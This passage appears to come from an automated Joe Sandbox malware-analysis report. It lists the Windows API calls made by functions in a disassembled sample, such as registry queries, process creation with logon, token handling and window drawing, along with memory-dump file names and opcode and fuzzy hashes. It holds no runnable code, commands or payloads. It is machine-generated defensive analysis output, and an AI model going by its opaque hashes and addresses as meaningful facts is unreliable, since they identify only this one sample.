                                                          • Part of subcall function 006A9CB3: _wcslen.LIBCMT ref: 006A9CBD
                                                          • Part of subcall function 0072C998: CharUpperBuffW.USER32(?,?,?,?,?,?,?,0072B6AE,?,?), ref: 0072C9B5
                                                          • Part of subcall function 0072C998: _wcslen.LIBCMT ref: 0072C9F1
                                                          • Part of subcall function 0072C998: _wcslen.LIBCMT ref: 0072CA68
                                                          • Part of subcall function 0072C998: _wcslen.LIBCMT ref: 0072CA9E
                                                        • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0072BCCA
                                                        • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 0072BD25
                                                        • RegCloseKey.ADVAPI32(00000000), ref: 0072BD6A
                                                        • RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 0072BD99
                                                        • RegCloseKey.ADVAPI32(?,?,00000000), ref: 0072BDF3
                                                        • RegCloseKey.ADVAPI32(?), ref: 0072BDFF
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.1366022221.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true
                                                        • Associated: 00000001.00000002.1365999747.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366091732.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366091732.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366147019.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366166225.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_6a0000_cNDddMAF5u.jbxd
                                                        Similarity
                                                        • API ID: _wcslen$Close$BuffCharConnectEnumOpenRegistryUpperValue
                                                        • String ID:
                                                        • API String ID: 1120388591-0
                                                        • Opcode ID: ee43b1c7ad5c7f420bf030aa57fbf1200fb3243346630de161d76e9360df9b8c
                                                        • Instruction ID: ed8eea9986c740c8ae9d95de936788bb45a6bc4a84a548048df9f209b004d93a
                                                        • Opcode Fuzzy Hash: ee43b1c7ad5c7f420bf030aa57fbf1200fb3243346630de161d76e9360df9b8c
                                                        • Instruction Fuzzy Hash: AF81BE70208241EFD714EF24C885E6ABBE5FF85308F14895CF5598B2A2DB35ED45CB92
                                                        APIs
                                                        • VariantInit.OLEAUT32(00000035), ref: 006FF7B9
                                                        • SysAllocString.OLEAUT32(00000001), ref: 006FF860
                                                        • VariantCopy.OLEAUT32(006FFA64,00000000), ref: 006FF889
                                                        • VariantClear.OLEAUT32(006FFA64), ref: 006FF8AD
                                                        • VariantCopy.OLEAUT32(006FFA64,00000000), ref: 006FF8B1
                                                        • VariantClear.OLEAUT32(?), ref: 006FF8BB
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.1366022221.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true
                                                        • Associated: 00000001.00000002.1365999747.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366091732.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366091732.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366147019.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366166225.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_6a0000_cNDddMAF5u.jbxd
                                                        Similarity
                                                        • API ID: Variant$ClearCopy$AllocInitString
                                                        • String ID:
                                                        • API String ID: 3859894641-0
                                                        • Opcode ID: 2b2c7be50fc61254365670e57ef8b5db7fa241b57dad4b4ff855e5826eed078f
                                                        • Instruction ID: d7c64717ca9e711501c74fa2ddc60f75761eba35b8a0e113c3b581251bdc3910
                                                        • Opcode Fuzzy Hash: 2b2c7be50fc61254365670e57ef8b5db7fa241b57dad4b4ff855e5826eed078f
                                                        • Instruction Fuzzy Hash: 0951F831900318BADF50AB65D895B79B3E6EF45310F24946AEA05DF292DBB08C40DB5A
                                                        APIs
                                                          • Part of subcall function 006A7620: _wcslen.LIBCMT ref: 006A7625
                                                          • Part of subcall function 006A6B57: _wcslen.LIBCMT ref: 006A6B6A
                                                        • GetOpenFileNameW.COMDLG32(00000058), ref: 007194E5
                                                        • _wcslen.LIBCMT ref: 00719506
                                                        • _wcslen.LIBCMT ref: 0071952D
                                                        • GetSaveFileNameW.COMDLG32(00000058), ref: 00719585
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.1366022221.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true
                                                        • Associated: 00000001.00000002.1365999747.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366091732.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366091732.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366147019.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366166225.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_6a0000_cNDddMAF5u.jbxd
                                                        Similarity
                                                        • API ID: _wcslen$FileName$OpenSave
                                                        • String ID: X
                                                        • API String ID: 83654149-3081909835
                                                        • Opcode ID: 3cc67134caea43713cd87e95fdede6a5a3bd287d75d6c6b01acb43707c9a9152
                                                        • Instruction ID: 2e02a88b6813bc8c88317358e3e81313078fec609979288877b9987abfe9c298
                                                        • Opcode Fuzzy Hash: 3cc67134caea43713cd87e95fdede6a5a3bd287d75d6c6b01acb43707c9a9152
                                                        • Instruction Fuzzy Hash: 44E1D3315083508FC754EF28C891AAAB7E2FF85310F04896DF9899B2A2DB34DD45CF96
                                                        APIs
                                                          • Part of subcall function 006B9BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 006B9BB2
                                                        • BeginPaint.USER32(?,?,?), ref: 006B9241
                                                        • GetWindowRect.USER32(?,?), ref: 006B92A5
                                                        • ScreenToClient.USER32(?,?), ref: 006B92C2
                                                        • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 006B92D3
                                                        • EndPaint.USER32(?,?,?,?,?), ref: 006B9321
                                                        • Rectangle.GDI32(00000000,00000000,00000000,?,?), ref: 006F71EA
                                                          • Part of subcall function 006B9339: BeginPath.GDI32(00000000), ref: 006B9357
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.1366022221.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true
                                                        • Associated: 00000001.00000002.1365999747.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366091732.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366091732.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366147019.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366166225.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_6a0000_cNDddMAF5u.jbxd
                                                        Similarity
                                                        • API ID: BeginPaintWindow$ClientLongPathRectRectangleScreenViewport
                                                        • String ID:
                                                        • API String ID: 3050599898-0
                                                        • Opcode ID: c501c6ed83dd6a9fad047e68fecc3fdbccfbc98245513abb4e077f358239d57b
                                                        • Instruction ID: 3c6e25b24d591463cdaf6206e5965cbe718b3010e48983869e98a454fd3ed942
                                                        • Opcode Fuzzy Hash: c501c6ed83dd6a9fad047e68fecc3fdbccfbc98245513abb4e077f358239d57b
                                                        • Instruction Fuzzy Hash: 7E41C1B1104200AFE721DF28CC85FFA7BEAEB45365F144229FB54872A1C735A886DB65
                                                        APIs
                                                        • InterlockedExchange.KERNEL32(?,000001F5), ref: 0071080C
                                                        • ReadFile.KERNEL32(?,?,0000FFFF,?,00000000), ref: 00710847
                                                        • EnterCriticalSection.KERNEL32(?), ref: 00710863
                                                        • LeaveCriticalSection.KERNEL32(?), ref: 007108DC
                                                        • ReadFile.KERNEL32(?,?,0000FFFF,00000000,00000000), ref: 007108F3
                                                        • InterlockedExchange.KERNEL32(?,000001F6), ref: 00710921
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.1366022221.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true
                                                        • Associated: 00000001.00000002.1365999747.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366091732.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366091732.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366147019.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366166225.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_6a0000_cNDddMAF5u.jbxd
                                                        Similarity
                                                        • API ID: CriticalExchangeFileInterlockedReadSection$EnterLeave
                                                        • String ID:
                                                        • API String ID: 3368777196-0
                                                        • Opcode ID: 2ecd78a34407a79c472df6e7d685d76f69b37956f33900eda6ca743671d69f43
                                                        • Instruction ID: 0a8c6d9686b3b9422ae59fcbca002a3fefadf65a7765d12b45b9dc9547e0eca7
                                                        • Opcode Fuzzy Hash: 2ecd78a34407a79c472df6e7d685d76f69b37956f33900eda6ca743671d69f43
                                                        • Instruction Fuzzy Hash: F6418F71900205EFEF159F64DC85AAA7779FF04310F1480A9ED00AA297DB74DEA1DBA8
                                                        APIs
                                                        • ShowWindow.USER32(FFFFFFFF,00000000,?,00000000,00000000,?,006FF3AB,00000000,?,?,00000000,?,006F682C,00000004,00000000,00000000), ref: 0073824C
                                                        • EnableWindow.USER32(00000000,00000000), ref: 00738272
                                                        • ShowWindow.USER32(FFFFFFFF,00000000), ref: 007382D1
                                                        • ShowWindow.USER32(00000000,00000004), ref: 007382E5
                                                        • EnableWindow.USER32(00000000,00000001), ref: 0073830B
                                                        • SendMessageW.USER32(?,0000130C,00000000,00000000), ref: 0073832F
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.1366022221.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true
                                                        • Associated: 00000001.00000002.1365999747.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366091732.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366091732.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366147019.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366166225.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_6a0000_cNDddMAF5u.jbxd
                                                        Similarity
                                                        • API ID: Window$Show$Enable$MessageSend
                                                        • String ID:
                                                        • API String ID: 642888154-0
                                                        • Opcode ID: b9fa229399d35af0fe82b54af20d07901401f384d477d1d683704f66a7255ec2
                                                        • Instruction ID: 5b01173f9f9967c7808c4eb6c40fedb8ad9e81251fbe962e16c84ef4c7a8cbb0
                                                        • Opcode Fuzzy Hash: b9fa229399d35af0fe82b54af20d07901401f384d477d1d683704f66a7255ec2
                                                        • Instruction Fuzzy Hash: 89418334601744EFEB51CF15C899BA97BE0FB0A715F1881A9FA085B263CB39A841CF56
                                                        APIs
                                                        • IsWindowVisible.USER32(?), ref: 00704C95
                                                        • SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 00704CB2
                                                        • SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 00704CEA
                                                        • _wcslen.LIBCMT ref: 00704D08
                                                        • CharUpperBuffW.USER32(00000000,00000000,?,?,?,?), ref: 00704D10
                                                        • _wcsstr.LIBVCRUNTIME ref: 00704D1A
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.1366022221.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true
                                                        • Associated: 00000001.00000002.1365999747.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366091732.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366091732.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366147019.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366166225.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_6a0000_cNDddMAF5u.jbxd
                                                        Similarity
                                                        • API ID: MessageSend$BuffCharUpperVisibleWindow_wcslen_wcsstr
                                                        • String ID:
                                                        • API String ID: 72514467-0
                                                        • Opcode ID: e01d13c19f0f1f542da394d5afbd9a385244e763c547042b6bc7543f65c5b109
                                                        • Instruction ID: 521dbc064bc53a50380c7fa3bd8637cbedfb95b810c1ed48a1c957ec6566653b
                                                        • Opcode Fuzzy Hash: e01d13c19f0f1f542da394d5afbd9a385244e763c547042b6bc7543f65c5b109
                                                        • Instruction Fuzzy Hash: 4A2107B2204210FBFB155B35DC0AE7B7BDDDF45750F10816DFA05DA1A1DA69CC4187A0
                                                        APIs
                                                          • Part of subcall function 006A3AA2: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,006A3A97,?,?,006A2E7F,?,?,?,00000000), ref: 006A3AC2
                                                        • _wcslen.LIBCMT ref: 0071587B
                                                        • CoInitialize.OLE32(00000000), ref: 00715995
                                                        • CoCreateInstance.OLE32(0073FCF8,00000000,00000001,0073FB68,?), ref: 007159AE
                                                        • CoUninitialize.OLE32 ref: 007159CC
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.1366022221.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true
                                                        • Associated: 00000001.00000002.1365999747.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366091732.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366091732.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366147019.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366166225.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_6a0000_cNDddMAF5u.jbxd
                                                        Similarity
                                                        • API ID: CreateFullInitializeInstanceNamePathUninitialize_wcslen
                                                        • String ID: .lnk
                                                        • API String ID: 3172280962-24824748
                                                        • Opcode ID: 8f8e6ddf9889d78515379b070bc369a78d2c9b481c6870302f632d54227c8f23
                                                        • Instruction ID: 137735d03595a2aa69c6ee58a0cc5311992da1911c35e416161e86b15c9d16c1
                                                        • Opcode Fuzzy Hash: 8f8e6ddf9889d78515379b070bc369a78d2c9b481c6870302f632d54227c8f23
                                                        • Instruction Fuzzy Hash: 1DD147B1608601DFC718EF18C48096ABBE6EF89710F14895DF8859B3A1DB35ED85CF92
                                                        APIs
                                                          • Part of subcall function 00700FB4: GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00700FCA
                                                          • Part of subcall function 00700FB4: GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00700FD6
                                                          • Part of subcall function 00700FB4: GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00700FE5
                                                          • Part of subcall function 00700FB4: HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 00700FEC
                                                          • Part of subcall function 00700FB4: GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 00701002
                                                        • GetLengthSid.ADVAPI32(?,00000000,00701335), ref: 007017AE
                                                        • GetProcessHeap.KERNEL32(00000008,00000000), ref: 007017BA
                                                        • HeapAlloc.KERNEL32(00000000), ref: 007017C1
                                                        • CopySid.ADVAPI32(00000000,00000000,?), ref: 007017DA
                                                        • GetProcessHeap.KERNEL32(00000000,00000000,00701335), ref: 007017EE
                                                        • HeapFree.KERNEL32(00000000), ref: 007017F5
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.1366022221.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true
                                                        • Associated: 00000001.00000002.1365999747.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366091732.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366091732.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366147019.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366166225.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_6a0000_cNDddMAF5u.jbxd
                                                        Similarity
                                                        • API ID: Heap$Process$AllocInformationToken$CopyErrorFreeLastLength
                                                        • String ID:
                                                        • API String ID: 3008561057-0
                                                        • Opcode ID: 1d63d78fc175b11c6b8fe4461b7278477d8ad7056a4aab54db4a0387bb6e1bef
                                                        • Instruction ID: 971a0dec10232068bce6180b2b804788b6a84a1d694141d6bbf6459ad85e56b3
                                                        • Opcode Fuzzy Hash: 1d63d78fc175b11c6b8fe4461b7278477d8ad7056a4aab54db4a0387bb6e1bef
                                                        • Instruction Fuzzy Hash: 5E11BE72500205FFEB159FA4CC49BAE7BE9EB4535AF508218F481A7290D739AD40DB60
                                                        APIs
                                                        • GetCurrentProcess.KERNEL32(0000000A,00000004), ref: 007014FF
                                                        • OpenProcessToken.ADVAPI32(00000000), ref: 00701506
                                                        • CreateEnvironmentBlock.USERENV(?,00000004,00000001), ref: 00701515
                                                        • CloseHandle.KERNEL32(00000004), ref: 00701520
                                                        • CreateProcessWithLogonW.ADVAPI32(?,?,?,00000000,00000000,?,?,00000000,?,?,?), ref: 0070154F
                                                        • DestroyEnvironmentBlock.USERENV(00000000), ref: 00701563
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.1366022221.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true
                                                        • Associated: 00000001.00000002.1365999747.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366091732.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366091732.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366147019.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366166225.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_6a0000_cNDddMAF5u.jbxd
                                                        Similarity
                                                        • API ID: Process$BlockCreateEnvironment$CloseCurrentDestroyHandleLogonOpenTokenWith
                                                        • String ID:
                                                        • API String ID: 1413079979-0
                                                        • Opcode ID: 1bfd1e36344714ef932e03df61b9009ed08486b3737941eef13351d597ee8360
                                                        • Instruction ID: 5c4cf0d04c80bf050b1f4fbad473209d1438bcc75595b2c338f85120a3955bf1
                                                        • Opcode Fuzzy Hash: 1bfd1e36344714ef932e03df61b9009ed08486b3737941eef13351d597ee8360
                                                        • Instruction Fuzzy Hash: 3B112972500249EBEF128F98DD49BDE7BE9EF48749F048115FA05A60A0C3798E64DB61
                                                        APIs
                                                        • GetLastError.KERNEL32(?,?,006C3379,006C2FE5), ref: 006C3390
                                                        • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 006C339E
                                                        • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 006C33B7
                                                        • SetLastError.KERNEL32(00000000,?,006C3379,006C2FE5), ref: 006C3409
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.1366022221.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true
                                                        • Associated: 00000001.00000002.1365999747.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366091732.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366091732.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366147019.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366166225.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_6a0000_cNDddMAF5u.jbxd
                                                        Similarity
                                                        • API ID: ErrorLastValue___vcrt_
                                                        • String ID:
                                                        • API String ID: 3852720340-0
                                                        • Opcode ID: 271492c2687cdbbdd336e866f063de9ea849ecb16559708e2657eacba564af00
                                                        • Instruction ID: cedeb6ead6cdb93bdd004c12a2bb310a1f48866f2bbf56e5ca7f27d100dcfe4d
                                                        • Opcode Fuzzy Hash: 271492c2687cdbbdd336e866f063de9ea849ecb16559708e2657eacba564af00
                                                        • Instruction Fuzzy Hash: 9901243260C3B1BEA62637757C95FB63A96EB15379320C22EF410853F0EF594D02528C
                                                        APIs
                                                        • GetLastError.KERNEL32(?,?,006D5686,006E3CD6,?,00000000,?,006D5B6A,?,?,?,?,?,006CE6D1,?,00768A48), ref: 006D2D78
                                                        • _free.LIBCMT ref: 006D2DAB
                                                        • _free.LIBCMT ref: 006D2DD3
                                                        • SetLastError.KERNEL32(00000000,?,?,?,?,006CE6D1,?,00768A48,00000010,006A4F4A,?,?,00000000,006E3CD6), ref: 006D2DE0
                                                        • SetLastError.KERNEL32(00000000,?,?,?,?,006CE6D1,?,00768A48,00000010,006A4F4A,?,?,00000000,006E3CD6), ref: 006D2DEC
                                                        • _abort.LIBCMT ref: 006D2DF2
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.1366022221.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true
                                                        • Associated: 00000001.00000002.1365999747.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366091732.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366091732.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366147019.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366166225.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_6a0000_cNDddMAF5u.jbxd
                                                        Similarity
                                                        • API ID: ErrorLast$_free$_abort
                                                        • String ID:
                                                        • API String ID: 3160817290-0
                                                        • Opcode ID: 3bf6e78e53b563725c0f157a3c8872c01105c99128eccd7ba07c57f944e4eb85
                                                        • Instruction ID: 1086f68610c5bd92a682aae8568380d216bd3ba3e048641623151f6417a4a219
                                                        • Opcode Fuzzy Hash: 3bf6e78e53b563725c0f157a3c8872c01105c99128eccd7ba07c57f944e4eb85
                                                        • Instruction Fuzzy Hash: 22F0CD31D0470267D75327357C36E5B25576FE27A1F24441FF464D23D1EE6889015279
                                                        APIs
                                                          • Part of subcall function 006B9639: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 006B9693
                                                          • Part of subcall function 006B9639: SelectObject.GDI32(?,00000000), ref: 006B96A2
                                                          • Part of subcall function 006B9639: BeginPath.GDI32(?), ref: 006B96B9
                                                          • Part of subcall function 006B9639: SelectObject.GDI32(?,00000000), ref: 006B96E2
                                                        • MoveToEx.GDI32(?,-00000002,00000000,00000000), ref: 00738A4E
                                                        • LineTo.GDI32(?,00000003,00000000), ref: 00738A62
                                                        • MoveToEx.GDI32(?,00000000,-00000002,00000000), ref: 00738A70
                                                        • LineTo.GDI32(?,00000000,00000003), ref: 00738A80
                                                        • EndPath.GDI32(?), ref: 00738A90
                                                        • StrokePath.GDI32(?), ref: 00738AA0
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.1366022221.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true
                                                        • Associated: 00000001.00000002.1365999747.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366091732.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366091732.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366147019.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366166225.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_6a0000_cNDddMAF5u.jbxd
                                                        Similarity
                                                        • API ID: Path$LineMoveObjectSelect$BeginCreateStroke
                                                        • String ID:
                                                        • API String ID: 43455801-0
                                                        • Opcode ID: fe290c9225c49ff4359e1db984cb138fbd965e2fc8777ea70c3699da98ab0992
                                                        • Instruction ID: cb1176cde34a79fcd0a1068211ef3425a3a01acc985bbe6c91467b8d28d1f69f
                                                        • Opcode Fuzzy Hash: fe290c9225c49ff4359e1db984cb138fbd965e2fc8777ea70c3699da98ab0992
                                                        • Instruction Fuzzy Hash: 84111E7600014CFFEF129F94DC48E9A7F6DEB04355F00C011BA1999161D7759D55DFA4
                                                        APIs
                                                        • GetDC.USER32(00000000), ref: 00705218
                                                        • GetDeviceCaps.GDI32(00000000,00000058), ref: 00705229
                                                        • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00705230
                                                        • ReleaseDC.USER32(00000000,00000000), ref: 00705238
                                                        • MulDiv.KERNEL32(000009EC,?,00000000), ref: 0070524F
                                                        • MulDiv.KERNEL32(000009EC,00000001,?), ref: 00705261
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.1366022221.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true
                                                        • Associated: 00000001.00000002.1365999747.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366091732.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366091732.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366147019.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366166225.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_6a0000_cNDddMAF5u.jbxd
                                                        Similarity
                                                        • API ID: CapsDevice$Release
                                                        • String ID:
                                                        • API String ID: 1035833867-0
                                                        • Opcode ID: 7e9e3cd9a7ebcaefff9c000fb953752ee2ed42847b4c60538daacf82c6d183ca
                                                        • Instruction ID: 616c60f966884322883999c29921d8d4b13b5842f52098750b88145db076ad65
                                                        • Opcode Fuzzy Hash: 7e9e3cd9a7ebcaefff9c000fb953752ee2ed42847b4c60538daacf82c6d183ca
                                                        • Instruction Fuzzy Hash: 67018FB6A00708FBEB119BA59C49A5EBFB8FF48352F048165FA04E7290D6749800CFA4
                                                        APIs
                                                        • MapVirtualKeyW.USER32(0000005B,00000000), ref: 006A1BF4
                                                        • MapVirtualKeyW.USER32(00000010,00000000), ref: 006A1BFC
                                                        • MapVirtualKeyW.USER32(000000A0,00000000), ref: 006A1C07
                                                        • MapVirtualKeyW.USER32(000000A1,00000000), ref: 006A1C12
                                                        • MapVirtualKeyW.USER32(00000011,00000000), ref: 006A1C1A
                                                        • MapVirtualKeyW.USER32(00000012,00000000), ref: 006A1C22
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.1366022221.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true
                                                        • Associated: 00000001.00000002.1365999747.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366091732.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366091732.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366147019.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366166225.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
